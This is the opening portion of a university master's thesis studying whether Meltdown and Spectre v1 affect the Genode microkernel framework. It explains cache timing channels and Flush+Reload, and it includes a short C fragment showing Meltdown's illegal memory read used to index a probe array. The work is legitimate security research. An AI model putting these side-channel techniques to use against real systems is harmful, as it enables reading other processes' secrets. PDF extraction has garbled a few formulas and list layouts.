Examining the Impact of Microarchitectural Attacks on Microkernels : a study of Meltdown and Spectre

(1)

Linköpings universitet SE–581 83 Linköping

Linköping University | Department of Computer and Information Science

Master thesis, 30 ECTS | Datateknik

2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of

architectural Attacks on

Micro-kernels

–

a study of Meltdown and Spectre

Gunnar Grimsdal

Patrik Lundgren

Supervisor : Felipe Boeira Examiner : Mikael Asplund

(2)

Upphovsrätt

Detta dokument hålls tillgängligt på Internet - eller dess framtida ersättare - under 25 år från publiceringsdatum under förutsättning att inga extraordinära omständigheter uppstår.

Tillgång till dokumentet innebär tillstånd för var och en att läsa, ladda ner, skriva ut enstaka kopior för enskilt bruk och att använda det oförändrat för ickekommersiell forskning och för undervisning. Överföring av upphovsrätten vid en senare tidpunkt kan inte upphäva detta tillstånd. All annan användning av dokumentet kräver upphovsmannens medgivande. För att garantera äktheten, säkerheten och tillgängligheten ﬁnns lösningar av teknisk och administrativ art.

Upphovsmannens ideella rätt innefattar rätt att bli nämnd som upphovsman i den omfattning som god sed kräver vid användning av dokumentet på ovan beskrivna sätt samt skydd mot att dokumentet ändras eller presenteras i sådan form eller i sådant sammanhang som är kränkande för upphovsmannens litterära eller konstnärliga anseende eller egenart.

För ytterligare information om Linköping University Electronic Press se förlagets hemsida http://www.ep.liu.se/.

Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for a period of 25 years starting from the date of publication barring exceptional circumstances.

The online availability of the document implies permanent permission for anyone to read, to download, or to print out single copies for his/hers own use and to use it unchanged for non-commercial research and educational purpose. Subsequent transfers of copyright cannot revoke this permission. All other uses of the document are conditional upon the consent of the copyright owner. The publisher has taken technical and administrative measures to assure authenticity, security and accessibility.

According to intellectual property law the author has the right to be mentioned when his/her work is accessed as described above and to be protected against infringement.

For additional information about the Linköping University Electronic Press and its procedures for publication and for assurance of document integrity, please refer to its www home page: http://www.ep.liu.se/.

(3)

Abstract

Most of today’s widely used operating systems are based on a monolithic design and have a very large code size which complicates verification of security-critical applications. One approach to solving this problem is to use a microkernel, i.e., a small kernel which only implements the bare necessities. A system using a microkernel can be constructed using the operating-system framework Genode, which provides security features and a strict process hierarchy. However, these systems may still be vulnerable to microarchitectural attacks, which can bypass an operating system’s security features, exploiting vulnerable hardware.

This thesis aims to investigate whether microkernels are vulnerable to the microarchitectural attacks Meltdown and Spectre version 1 in the context of Genode. Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in a Genode’s remote procedure call.

The result shows how Genode does not mitigate the Meltdown attack, which will be confirmed by demonstrating a working Meltdown attack on Genode+Linux. We also determine that microkernels are vulnerable to Spectre by demonstrating a working attack against two microkernels. However, we show that the cost of mitigating this Spectre attack is small, with a cost of 3% slowdown for remote procedure calls in Genode.

(4)

Acknowledgments

We would like to thank all the people at Sectra Communications AB for their welcoming and assistance with our thesis. We would like to give special thanks to our supervisor Christian Vestlundfor his engagement and supporting knowledge on side-channel attacks. Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing a thesis.

From Linköping University, we would like to thank our examiner Mikael Asplund for his enthusiasm and academic input and Felipe Boeira for his feedback and support in writing our thesis.

(5)

1.4 Motivation . . . 4 1.5 Aim . . . 4 1.6 Research Questions . . . 4 1.7 Delimitations . . . 5 1.8 Thesis Outline . . . 5 2 Background 6 2.1 CPU Optimizations . . . 6 2.1.1 Cache . . . 6 2.1.2 Data Prefetching . . . 7 2.1.3 Out-of-Order Execution . . . 7 2.1.4 Speculative Execution . . . 7 2.1.5 Intel TSX . . . 7 2.2 Timing Channels . . . 7

2.2.1 Cache-Based Timing Channels . . . 8

2.2.2 Accurately Measuring Time . . . 8

2.3 Flush+Reload . . . 9

2.3.1 Shared Memory . . . 9

2.3.2 Preventing Data Prefetching . . . 10

2.4 Meltdown . . . 10

2.4.1 Virtual Address Space . . . 10

2.4.2 Meltdown Attack Description . . . 11

2.4.3 Proof-Of-Concept Implementation . . . 11

2.4.4 Mitigations . . . 12

2.4.5 Meltdown on Genode . . . 12

2.5 Spectre . . . 12

2.5.1 Spectre V1 Attack Description . . . 13

2.5.2 Spectre V1 Mitigations . . . 13

(6)

2.5.2.2 Index Bitmasking . . . 14 2.6 Performance . . . 15 2.6.1 Microkernel Performance . . . 15 2.6.2 IPC Performance . . . 15 2.7 Related Work . . . 15 2.7.1 Genode . . . 16 2.7.2 Side Channels . . . 16 2.7.3 Microarchitectural Attacks . . . 16

2.7.4 Linux Control Groups . . . 17

2.7.5 Security by Virtualization . . . 17

3 Method 18 3.1 Setting up System Under Test . . . 18

3.1.1 Using x86 Intrinsics . . . 18

3.1.2 Obtaining Output . . . 19

3.1.3 Building and Running on Nova . . . 20

3.1.4 Building and Running on Okl4 . . . 20

3.1.5 Building and Running on Linux . . . 21

3.1.6 Measuring Throughput . . . 21

3.2 Implementing the Flush+Reload Channel . . . 22

3.2.1 Measuring Cache Hits . . . 22

3.2.3 Adapting the Channel to Targeted Kernels . . . 24

3.2.4 Measuring Throughput of the Covert Channel . . . 25

3.2.5 Reducing Noise . . . 25

3.3 Implementing Meltdown . . . 26

3.3.1 Recovering from Segmentation Fault . . . 26

3.3.2 Disabling Mitigations . . . 26

3.3.3 Choosing a Target Address . . . 26

3.4 Implementing Spectre . . . 27

3.4.1 Ensuring Speculative Execution . . . 28

3.4.2 Configure Variables for Spectre . . . 28

3.4.4 Measuring Impact of Mitigations . . . 29

4 Results 30 4.1 Flush+Reload . . . 30

4.1.1 Choosing Cache-Hit Thresholds . . . 30

4.2 Meltdown . . . 37

4.2.1 Reading a Victim’s Secret . . . 37

4.2.2 Reading the Linux Version Banner . . . 37

4.3 Spectre . . . 37

4.3.1 Training the Branch Predictor . . . 37

4.3.2 Ensuring Speculative Execution . . . 39

4.3.3 Attack Throughput . . . 39

4.3.4 Mitigations . . . 39

(7)

5.1.1 Cache-Hit Measurements . . . 43

5.1.2 Choosing Cache-Hit Thresholds . . . 44

5.1.4 Inaccuracies in Throughput Measurements . . . 44

5.2 Meltdown . . . 45

5.2.1 Alternative Segmentation Fault Recovery . . . 45

5.2.2 Turning off Mitigations . . . 45

5.2.3 The Difficulties of Reading Secrets . . . 45

5.2.4 Reliability Issues with Meltdown . . . 46

5.3 Spectre . . . 46

5.3.1 Training the Branch Predictor . . . 46

5.3.2 Criticism of Heuristic Cache Flush . . . 46

5.3.3 Throughput Anomalies . . . 46

5.3.4 Small Impact on Performance . . . 47

5.4 Source criticism . . . 47

5.5 The Work in a Wider Context . . . 48

5.5.1 Can OS Memory Separation be Trusted? . . . 48

5.5.2 Can Hardware Separation be Trusted? . . . 48

5.5.3 Consequences for Security and Safety Critical Systems . . . 48

5.5.4 Impact of This Work . . . 49

6 Conclusion 50 6.1 Future Work . . . 51

(8)

List of Figures

2.1 A model of virtual memory composition. . . 11

3.1 Overview of Genode’s Hierarchy . . . 19

3.2 The communication setup to retrieve output from the tested system. . . 19

3.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array. . . 22

3.4 A model of memory access times for different memory levels. . . 23

3.5 A sequence diagram for measurements of the LLC access times. . . 23

3.6 Leak Array Layout . . . 24

3.7 A sequence diagram of Flush+Reload communication between two processes. . . . 25

3.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload. . . 26

3.9 A sequence diagram of Spectre using Flush+Reload. . . 27

4.1 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4. . . 31

4.2 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova. . . 31

4.3 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux. . . 32

4.4 Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on OKl4. . . 32

4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4. . . 33

4.6 Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux. . . 37

4.7 Throughput out of for different choices of Taand Nawhen reading a total of 2048 bytes on Genode+Okl4. . . 38

4.8 Throughput of the Spectre attack for different choices of Taand Nawhen reading a total of 2048 bytes on Genode+Nova. . . 38

4.9 Throughput of the Spectre attack for different choices of Taand Nawhen reading a total of 2048 bytes on Genode+Linux. . . 38

4.10 Throughput for Spectre V1 using different choices of Hsfor heuristically flushing the cache. . . 39

4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations. . . 40

4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations. . . 40

4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations. . . 41 4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling the

(9)

4.15 Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux. . . 42

(10)

List of Tables

4.1 The Cache-hit thresholds in CPU cycles for each kernel. . . 31 4.2 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Okl4 for different internal padding sizes. . . 31 4.3 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Nova for different internal padding sizes. . . 32 4.4 Number of cache hits from iteration over uncached array using an SRG 256 times

on Genode+Linux for different internal padding sizes. . . 32 4.5 Reading 2048 bytes with Flush+Reload within one process. . . 33 4.6 Reading 2048 bytes with Flush+Reload between two processes. . . 34 4.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with

different number of attempts. . . 34 4.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with

different number of attempts. . . 34 4.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with

different number of attempts. . . 35 4.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4

with different number of attempts. . . 35 4.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova

with different number of attempts. . . 35 4.12 Reading 2048 bytes between two processes, using Flush+Reload on

Genode+Linux with different number of attempts. . . 36 4.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters. . . 39 4.14 Mean relative slowdown and standard deviation after applied lfence mitigation. 41 4.15 Mean relative slowdown and standard deviation after applied bitmask mitigation. 41

(11)

(12)

1 Introduction

Most of today’s widely used Operating Systems (OSs) like Windows, GNU/Linux and OSX1 are based on a monolithic design, meaning that all parts of the operating system act as a trusted part of the kernel. In such a design, drivers, file system and Inter-Process Communication (IPC) are all handled as part of the kernel and trusted as such. Consequently, a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSs based on a monolithic design, like Windows and GNU/Linux, are difficult to verify due to their size. The Linux kernel contains millions of lines of source code and is frequently updated [6]. While there have been efforts to formally verify the correctness of software against a specification this has only been performed on a much smaller scale. The Sel4 kernel, with its 9300 lines of code [23], has been formally verified against its specification at the cost of roughly 20 to 1 verification code against source code and 22 person-years of work2. Microsoft researchers Hawblitzel et al. have in the Ironclad project [16], instead of focusing on application verification, used automated tools to verify security-critical libraries. The Ironclad project achieved a less costly verification at a 4.8 to 1 line of verification to source code and 3 person-years of work. However, the fact remains that formal verification is very costly, and that OSs containing millions of lines of code are with today’s tools far out of reach at a 5 times increase in development cost.

1.1 Microkernel

One approach to mitigate this size issue is to replace the monolithic kernel with a microkernel. A microkernel is a small kernel, typically containing only around 10,000 lines of code3. This small size stems from one of the leading design goals of a microkernel, which is to run most services in user space and providing only essential functionality in kernel space. This type of design reduces the amount of privileged code and may reduce the risk that kernel-level services are compromised. It also allows for the possibility of disabling unneeded services, which is important as it may reduce the attack surface of the kernel.

1_{Operating System Market Share Worldwide. en. May 2019.}_URL_: http://gs.statcounter.com/os-market-share(visited on 2019-05-06).

(13)

1.2. Genode

1.2 Genode

The small amount of code in microkernels may result in lack of some useful functionality such as protocol stacks and network drivers. Genode is a framework for building secure OSs using a microkernel and tries to address the issue of missing OS components [7]. Genode provides more than 100 ready-to-use components such as network drivers and protocol stacks. In Genode, as many components as possible are executed in user space. One key feature of Genode is that components are assigned a budget by its parent process for resources such as CPU-time, memory and file system access. Genode has been developed to run on multiple kernels, for example, Nova, Okl4 and Linux. The Nova kernel, which is a microhypervisor, is a research project aimed at secure virtualization. Similar to a microkernel, it provides essential functionality for virtualization like communication, scheduling and resource management4. Okl4 is an open-source microkernel based on the L4 microkernel. It can be used as a hypervisor or as a real-time OS and has been used practically by General Dynamics5.

Genode tries to achieve a secure OS design by carefully isolating components using hardware and software separation [7]. Microarchitectural attacks have in some ways compromised software and hardware separation. These attacks exploit the microarchitectural state of the CPU, e.g., caches or Translation Lookaside Buffer (TLB). Such attacks may break software which is dependent on a correct hardware implementation. This class of attacks has had recent success in the form of Meltdown and Spectre [31, 24].

1.3 Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs may execute instructions out of order [31]. Specifically, Meltdown can read memory from an addressable memory space which it should not be able to read from. Lipp et al. [31] used a Meltdown exploit to read memory from the kernel and other user processes in Linux. This was possible as the Linux kernel’s memory was mapped into the address space of each user process. Genode’s founder Feske has stated that some in-kernel data structures in Genode are likely vulnerable to the Meltdown attack6.

Spectre relies on the fact that some modern CPUs may speculatively execute instructions [24]. There are different versions of the Spectre attack [42, 24, 33], we will be looking at Spectre version 1. Spectre version 1 exploits speculative execution to bypass boundary checks. An attacker could use this attack to execute code which bypasses a boundary check and leaks information to the attacker.

Both Meltdown and Spectre rely on an attacker being able to transmit gathered data to and from the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the time difference of fetching uncached and cached data [48]. This channel can be used in the context of Meltdown and Spectre to first read kernel memory into a cache exploiting their respective CPU optimizations. If the address which is cached is carefully crafted, the time with which a process can access this address can be measured to retrieve information.

SCAs extract information from another system or user by abusing some aspects of the system which are not supposed to transmit information. A side channel can also be used as a covert channel, i.e., a channel in which two colluding actors communicate via a side channel.

4_{NOVA Microhypervisor.}_URL_{: http://hypervisor.org/ (visited on 2019-03-19).}

5_{General Dynamics. Hypervisor Products - General Dynamics Mission Systems. en. 2018.} _URL_{: https : / /} gdmissionsystems.com/en/products/secure-mobile/hypervisor(visited on 2019-03-22).

6_{N. Feske. Side-channel attacks(Meltdown, Spectre). 2018.} _URL_{: https : / / sourceforge . net / p / genode /} mailman/message/36178974/(visited on 2019-01-16).

(14)

1.4. Motivation

1.4 Motivation

Software separation may work as mitigation against some microarchitectural attacks. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel map from user space and therefore removes Meltdown’s ability to access kernel memory7. However, the methods used to mitigate Meltdown significantly impact performance [36].

There have been efforts to mitigate the Spectre attack. However, mitigations against Spectre attacks are focused on treating the symptoms of the attack rather than preventing it. This is due to the fact that disabling speculative execution is usually not supported and that any CPU performing speculative execution may leak data [33]. Thus, the options to address the problem are either to mitigate the attacks in software or the very expensive options of replacing speculating CPUs for non speculating ones.

The Genode OS framework is interesting from a security standpoint for its strict process separation, its adherence to a minimal kernel and open-source code. However, it has been suggested by Feske that some information can leak from Genode by the Meltdown attack8. A successful attack may compromise security guarantees which is the very reason to reach for Genode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks. Schmidt et al. [39] demonstrated ways to circumvent security policies for Genode’s IPC. Schmidt et al. implemented a covert channel which abused a file system cache in Genode. The covert channel Schmidt et al. created could transfer data with a rate of 2 bit/s between two user owned processes. To the best of our knowledge, there has been no previous work demonstrating a violation of Genode’s memory separation.

1.5 Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. In particular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernels as well as to measure the performance impact after Spectre version 1 mitigations have been applied.

1.6 Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of demonstrated channel?

We answer this research question by demonstrating a working Flush+Reload channel between two processes in Genode. We define throughput as the number of successfully transmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as throughput of demonstrated attack?

We answer this research question by demonstrating a Spectre attack exploiting a victim using bounds-checked array access. The target implements a vulnerable RPC which is one of Genode’s mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode?

We answer this research question by demonstrating that Meltdown can be used to read data from another process.

(15)

1.7. Delimitations

4. What is the performance impact of Spectre V1 Spectre mitigations alternatives, measured as relative slowdown of RPC mechanisms?

To answer this research question, we apply different mitigations and measure their respective performance impacts for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of 2 kB/s using Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by reading memory from a victim process, transmitting up to 9 kB/s. In addition, we show that the performance impact of two different Spectre V1 mitigations on Genode’s RPCs is negligible. Consequently, we demonstrate that these microkernels are not secure by design and that Genode does not provide protection against microarchitectural attacks.

1.7 Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (Intel Core i5-7500 CPU). There will not be any efforts to compare results on different types of hardware, nor will there be efforts to evaluate kernels which are not supported by Genode.

1.8 Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations as well as more detailed information regarding the workings of microarchitectural attacks and performance measurements in Chapter 2. The method used to obtain results is presented in Chapter 3 and results in Chapter 4. Work presented in a wider context and answers to research questions are presented in Chapter 5 and Chapter 6 respectively.

(16)

2 Background

To understand the workings and implications of Meltdown and Spectre there is a need for a fundamental understanding of CPU optimizations. Thus, this chapter begins by describing the main optimizations which are utilized in the attacks. Furthermore, an understanding of timing channels is needed to understand the tools with which microarchitectural leak information. For this reason, this chapter continues by describing timing channels before moving on to the Meltdown and Spectre attacks.

2.1 CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time, some of which need be taken into account by a developer, others which seamlessly optimize executing code. Some of these optimizations may have noticeable effects on code execution, often relating to reduced execution time. For this reason, these optimizations are relevant to the use of timing channels.

2.1.1 Cache

The time it takes to access data from DRAM is a bottleneck in modern computers, one memory access to DRAM can take 240 CPU cycles on an Intel Pentium M processor [15]. Modern CPUs also contain faster memory called cache. The cache is often divided into different levels, where the levels closer to the CPU core are faster but smaller than the cache on higher levels [15]. The number of cache levels varies depending on which CPU is used. The cache closest to the core is called L1 cache, on the next level is the L2 cache and so on [15]. The highest level cache is called Last-Level Cache (LLC) and is often the L2 or L3 cache in Intel CPUs, this cache is shared between multiple cores on multi-core CPUs [48]. The CPU used in this thesis has three cache levels, L1, L2 and LLC; witch can be seen by running the command lscpu in the Linux terminal.

Memory accesses which resolve to a cache access are usually referred to as cache hits, whereas memory accesses which do not are referred to as cache misses.

(17)

2.2. Timing Channels

2.1.2 Data Prefetching

Data prefetching is an optimization which speculatively loads data into cache before it is explicitly used. This is done to improve the performance of predictable access patterns, such as sequential access [19].

2.1.3 Out-of-Order Execution

Modern CPUs have an optimization which allows the CPU to execute instructions out of order [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneously or before preceding instructions, this is done to minimize the time the CPU is stalled [19]. Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetches memory located at ptr, and line 2 cannot be executed while this fetching is in progress. The CPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched.

Listing 2.1: Example of Out-of-Order Execution

1 mov edx, [ptr] ; Copy data from memory located at ptr to edx

2 add edx, 1 ; Add 1 to edx

3 mov ebx, 1 ; Copy 1 to ebx, may execute before line 2

2.1.4 Speculative Execution

Speculative execution is a technique for reducing the execution time of programs by speculatively executing a branch which has yet to be determined valid [18]. If the branch is determined invalid, the result of the computations are reversed, returning the CPU to its state before the speculative execution [18]. However, speculative execution may alter the microarchitectural state of the processor, including TLB and caches [18].

The Branch-Prediction Unit (BPU) makes different types of predictions for branches to enable faster execution. For conditional branches, the BPU a predicts either a false or true outcome depending on values stored in the Branch-Target Buffer (BTB) [19].

2.1.5 Intel TSX

Some Intel processors support the so-called Intel Transactional Synchronization Extension (TSX). This extension allows for transactional execution of code under some restrictions [20]. At its core, Intel TSX allows for executing some instructions as a transaction, either committing the result of these instructions or aborting, subsequently reverting changes to the CPU’s state from the computations. Similarly to speculative execution, Intel TSX does not revert microarchitectural state [20] and may thus leave information in the cache from an aborted transaction.

2.2 Timing Channels

Lampson wrote a paper defining covert channels in 1973, his definition was:

”Covert channels, i.e. those not intended for information transfer at all, such as the service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a component which is not intended for communication.

Side channels are unintended communication channels which depend on the physical implementation of a system rather than a theoretical weakness of it [11]. We distinguish side channels from covert channels in that a covert channel is between two or more cooperating agents, while a side channel is one received by an attacker to spy on a victim.

(18)

2.2. Timing Channels

Timing channels are a subset of SCAs, where an attacker examines the time it takes for a certain task. Brumley and Boneh [2] executed a timing attack against a server running Apache with OpenSSL. Brumley and Boneh could extract the RSA key from the server by executing malformed SSL handshake multiple times, measuring the server’s response time to retrieve information from the computations.

2.2.1 Cache-Based Timing Channels

One category of these timing-channel attacks are cache-based channels; these attacks utilize that access time for a memory address varies dependent on whether value is stored in the cache or not [8]. Cache-based channels include: Prime+Probe, Flush+Reload and Evict+Time [8, 48].

2.2.2 Accurately Measuring Time

A reliable way to measure the time it takes for a value to be accessed is a necessity for a cache-based timing channel to be implemented. Paoloni [34] has published guidelines for benchmarking code execution on Intel 32 and 64-bit architectures. Paoloni describes the use of the Time-Stamp Counter (TSC) which counts the CPU cycles for measuring time. Intel 32 and 64 bit architectures come with two instructions for reading TSC: rdtscand

rdtscp. Paoloni recommends measurement using the timer in Listing 2.2 which uses the

instructionsrdtsc,rdtscpandcpuidto prevent OOE. Yarom and Falkner noted that use of the instructioncpuidmay not be desirable for cross Virtual Machine (VM) channels as the instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of the

cpuidinstruction they instead use a load fence, a tool which stalls the CPU until all previous

loads have resolved. Therdtscinstruction reads the TSC into the CPU registers edx and eax. Similarly, rdtscpreads TSC into these registers but additionally waits for previous instructions to have executed [34].

Paoloni also suggests an alternative method, presented in Listing 2.3, for when the

rdtscpinstruction is not available.

Listing 2.2: Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions

2 rdtsc ; Read TSC into edx, eax

3 mov var1, edx, ; Store TSC in var1 and var2

4 mov var2, eax;

5 ; Call measured function here

6 rdtscp ; Serialize previous instructions and read TSC

7 mov var3, edx ; Store second TSC into var3 and var4

8 mov var4, edx ;

(19)

2.3. Flush+Reload

Listing 2.3: Alternative Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions

2 rdtsc ; Read TSC into edx, eax

3 mov var1, edx, ; Store TSC in var1 and var2

4 mov var2, eax;

5 ; Call measured function here

6 cpuid ; Serialize previous instructions

7 rdtsc ; Read TSC

8 mov var3, edx ; Store second TSC into var3 and var4

9 mov var4, edx ;

10 cpuid ; Prevent OOE for following instructions

2.3 Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] which exploits timing of the LLC. Therefore, Flush+Reload does not require that the attacker and victim run their respective processes´ on the same CPU core. Flush+Reload relies on sharing pages with a victim process, as this allows for Flush+Reload to control caching of these shared pages [48].

The attack Yarom and Falkner developed works by evicting a specific memory line using clflush, subsequently letting the victim execute. After the victim has executed the attacker can now check whether the evicted line is once again in cache. Checking whether the value is in the cache is done by defining a machine-specific time threshold below which values are considered cache hits. Yarom and Falkner profiled cache misses using clflush to define the threshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload and concluded that the threshold should be below the but close to the lower boundary of DRAM access times.

Yarom and Falkner note that some CPU optimizations may result in false positives, e.g. speculative execution or data prefetching. Consequently, it is desirable to have strategies to filter these false positives, Yarom and Falkner do not suggest methods for filtering these false positives.

2.3.1 Shared Memory

One requirement for Flush+Reload is the availability of shared memory between the attacker and the victim. Multiple processes can have access to a shared physical memory space in modern OSs1. One reason for using shared memory is to optimize memory usage when multiple processes are using the same library [31]. The OSs may have a library loaded once into physical memory and reference the memory space with different virtual memory addresses. Hence, instead of every process loading the library in its own user space, the library is only loaded once and after that shared by multiple processes. User processes can also use shared memory for IPC in some OSs [31].

This mechanisms for optimizing used of shared libraries have been used by [48] to extract encryption keys via a Flush+Reload side channel.

Genode has a strict separation between its processes and should, therefore, not optimize the memory usage by sharing memory [7]. However, a Flush+Reload channel may still be used between to processes sharing memory for IPC2.

1_{M. T. Jones. Anatomy of Linux dynamic libraries. 2008.} _URL_{: https://www.ibm.com/developerworks/} linux/library/l-dynamic-libraries/(visited on 2019-01-17).

2_{N. Feske. Side-channel attacks(Meltdown, Spectre). 2018.} _URL_{: https : / / sourceforge . net / p / genode /} mailman/message/36178974/(visited on 2019-01-16).

(20)

2.4. Meltdown

2.3.2 Preventing Data Prefetching

Several techniques have been shown to be effective at preventing data prefetching. Reads using randomized order or a random-order linked list are techniques which have been suggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], although not explicitly stated, utilize a form of strided reads in their POC, thus preventing data prefetching. We will denote the form of strided reads used by Kocher et al. as Strided Read Generators (SRGs) which can be constructed as

xsi=ai+b mod m where,

a 1 (mod p)

for all prime factors p in m. For example, choosing a, b and m as $ ' & ' % a=127 b=0 m=256

gives a sequence xsiP t0, 127, 1, 128u from a sequence i P t0, 1, 2, 3u.

2.4 Meltdown

Meltdown is a microarchitectural attack leveraging OOE execution in some modern processors to leak memory via a cache covert channel. The OOE execution is used to modify the contents of the cache; subsequently, the altered cache is read via a covert channel [31].

Lipp et al. [31] describes two practical Meltdown attacks. The first attack described how an attacker could read stored passwords from Firefox running on the same machine [31]. The second attack demonstrated how an attacker could exploit a system to dump the memory from another process, even with Kernel Address Space Layout Randomization (KASLR) active [31]. KASLR is a mechanism which randomizes the kernel space memory layout at boot time [9].

2.4.1 Virtual Address Space

The process executing the Meltdown attack is required to have a virtual memory address corresponding to the physical memory address where the targeted data is located. Virtual memory is designed to isolate processes from each other. Virtual memory also acts as an abstraction from hardware and physical memory, exposing a conceptually infinite space of memory [15, p.38].

Hat [15] explains how the virtual address is split, one part indexing a page directory entry, the other indexing an offset within that page. Multiple page directory entries may resolve to the same physical memory page. Shared memory is commonly implemented in this way, i.e. mapping multiple virtual addresses to the same physical memory address [15, p.38].

Figure 2.1 shows the virtual memory map of a process running on 64 bit Linux. The process’s memory space, i.e. user space, is located at the lower address range and the kernel at the highest address range. In between user and kernel space is unused address space. The layout of the kernel space is the same for all user processes in Linux. This is done to remove the need of swapping the Memory-Management Unit (MMU) when switching to kernel mode, which is a costly operation3.

(21)

2.4. Meltdown 0x0000000000000000 User Space 0x0000008000000000 Unused Space 0xFFFFFF8000000000 Kernel Space 0xFFFFFFFFFFFFFFFF Figure 2.1: A model of virtual memory composition.

2.4.2 Meltdown Attack Description

An attacker can read some data and use this data to index in an array. The attacker could then use a covert cache channel to inspect which index in the array was accessed to see what the initial data was.

The Meltdown attack is performed in this way; indexing an array with the value from an illegal memory access. This will on most kernels raise a segmentation fault, preventing the address of being read and triggering signal handling. However, if the CPU uses OOE execution, the array may be indexed with the data before the signal handling occurs [31]. Listing 2.4 shows an example of how the Meltdown attack may work. Here the data from the address 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOE execution is available, the access of data may occur before the signal handling and leave the data in the cache.

For Meltdown to read a memory address, that address needs to be mapped into the address space of the user process, i.e., the user process needs to have access to virtual memory corresponding to the physical memory of the process under attack [31].

Listing 2.4: Meltdown Memory Access 1 // Illegal memory read

2 char ill = * (char_{*) 0x7ffffdf9d580;}

3 // PAGE_SIZE offset is to prevent the prefetcher from

4 // fetching adjacent data, i.e. so that

5 // the exact value of ill can be identified when with Flush+Reload

6 data[ill * PAGE_SIZE] = 0;

2.4.3 Proof-Of-Concept Implementation

Lipp et al. [31] created a Proof-Of-Concept (POC) implementation for Meltdown which can be found on Github4_{. The control flow of the attack is implemented as follows:}

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targeted address.

3. Recover from the triggered segmentation fault. 4. Test indices in the shared array for a cache hit.

(22)

2.5. Spectre

Several tools have been used to execute these steps. To flush the targeted address, the clflushinstruction has been used [31]. Shared memory is used in the case of Flush+Reload, which is a well-performing side channel [48]. Recovering from the segmentation fault can be handled in Linux via the use of custom signal handlers, or more efficiently via the use of Intel TSX [31]. For the last step of testing values for cache hits, two methods are presented here; test after each read and test all values after a single read. The latter is discussed as two versions, firstly, testing all values using a mixed order iteration and secondly, to test all values using a large offset. In addition, it is necessary to accurately determine to which cache level a memory access was made. To do this, a high-resolution timer like the TSC can be used [31]. They are, however, not necessary as there are techniques to construct a high-resolution timer from lower resolution ones [41].

An attacker targeting Genode and microkernels has some limitations related to the tools discussed above. Signal handling of certain signals are not as flexible as needed on Genode, including handling of segmentation faults [7].

Caching of targeted data may pose as an unreasonable prerequisite. Intel TSX has been utilized in place of signal handling to recover from the segmentation fault; this method has been proven as the most effective [31]. The reason being that there is hardware support for reverting a transaction. Thus, the OS cannot observe that a faulty access was made during this transaction [31].

2.4.4 Mitigations

There have been efforts to mitigate both Meltdown and Spectre in software; consequently, there is a need to present which mitigations exist, how they work and how they are applied.

Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown by removing the kernel map from user space and, therefore, removes Meltdown’s ability to access kernel memory [31]. KAISER has now been renamed to Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4 of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to 50% due to increased execution time of a user-to-kernel context switch.

2.4.5 Meltdown on Genode

Genode’s founder Feske6 _{has discussed the implications of Meltdown on Genode. Feske} stated that due to the minimalistic responsibilities of the microkernel, there is not as much information to leak from the kernel. Furthermore, the only memory pages shared between user applications and the kernel are thread control blocks. This limits the accessible information through shared LLC. Feske also suggested that the Meltdown attack should be tested on different kernels to get a complete picture of what information can be leaked.

Genode’s signal handling is not as adaptable as the one in Linux. An attacker cannot install a custom handler for the segmentation fault [7]. Consequently, the attacker cannot recover from a segmentation fault in this way.

